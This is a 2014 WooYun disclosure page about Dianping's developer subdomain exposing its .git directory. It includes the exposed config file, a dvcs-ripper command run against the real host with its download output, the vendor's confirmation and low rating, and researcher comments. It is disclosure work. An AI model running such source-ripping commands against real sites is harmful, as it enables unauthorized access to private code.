当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089373

漏洞标题:大众点评某分站源码可被下载

相关厂商:大众点评

漏洞作者: 路人甲

提交时间:2014-12-30 16:39

修复时间:2015-02-13 16:40

公开时间:2015-02-13 16:40

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认,细节仅向厂商公开
2015-01-09: 细节向核心白帽子及相关领域专家公开
2015-01-19: 细节向普通白帽子公开
2015-01-29: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述:

大众点评某分站源码可被下载,自查

详细说明:

http://developer.dianping.com/.git/config

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true


WooYun: 友盟网git服务使用不当导致源代码泄露

漏洞证明:

root@kali:~/dvcs-ripper# perl rip-git.pl -v -u http://developer.dianping.com/.git
[i] Downloading git files from http://developer.dianping.com/.git
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[!] Not found for objects/2a/2a692920657d0861d246204df95591a0a25a45: 404 Not Found
[!] Not found for objects/bd/9b4120bfb2bde155b63740b5eaa9904c68a106: 404 Not Found
[d] found refs/heads/master
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: HEAD: invalid sha1 pointer daacd98271c7effbd5724ceec91ca67a65d5e638
error: refs/heads/master does not point to a valid object!
notice: No default references
[d] found objects/02/62ed39be1a9164ae28b70c88ba5d8c39c41539
[d] found objects/06/0c87968d255d922b58bbcc0ece7c656995107b
[d] found objects/0b/1262e7608b1945648ddffccbde1ff139fa5622
[d] found objects/0f/144685f7140d2694eeba5609322b4cd79f0bf8
[d] found objects/0f/d275e94660402f80f01505d28b90a23f7e0209
[d] found objects/11/5030dc889ca5f267bf2caf121ff3d3c2db277b
[d] found objects/14/3edf44b0daa4cef1a452ecccac21aee22a8d77
[d] found objects/17/7698bcd493cf25fab0e4314a6dfc92f93d01ba
[d] found objects/1a/740d15247e7d136b2d2f452cefc4aa842a4c7b
[d] found objects/1d/eef144cb17ed2c11c6cdcdcb2d9530fa8d0b47
[d] found objects/1d/425cf7d7e25f81be64d32c406ff66cfb6c4766
[d] found objects/28/f6d6527d83cdd4d472d1edfaade000ae3847ec
[d] found objects/29/fabcc1d5ac5387ede2a645ae1860abe5a0e22a
[d] found objects/2b/d08d7f5be5e97811f86cd1f1c8db2e013da5aa
[d] found objects/38/d6378b829437d673674d3fc7bfec2df2fe6f5e
[d] found objects/3c/b4f31397f6b433f1191806f5d087e408d93657
[d] found objects/3c/c85568af7897773247cff85ef522cb2631eb01
[d] found objects/3f/68f4beb769245c85cc184041fbbcafa3a107bb

修复方案:

删除

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-12-30 18:22

厂商回复:

确认为运维自动化系统的部分代码,均不涉及业务。
故危害等级为 低。
感谢对点评网安全的关注~

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-30 16:45 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    又不影响数据有个蛋蛋 是吧 @猪猪侠

  2. 2014-12-30 16:49 | 钝刀的老王 ( 路人 | Rank:2 漏洞数:2 | 挑水,你桶漏的;扫地,你扫不干净;刀钝了...)

    不是刚才提交过了? WooYun: 大众点评多个分站源码可被下载 DP的源代码应该没存在服务器上,而是内网的gitlab服务器上。

  3. 2014-12-30 16:55 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @xsser 大公司系统多,耦合性强,今天泄露的敏感信息,对于未知的明天影响老大了。

  4. 2014-12-31 09:50 | 盛大网络(乌云厂商)

    @xsser发火了 点评你分给高点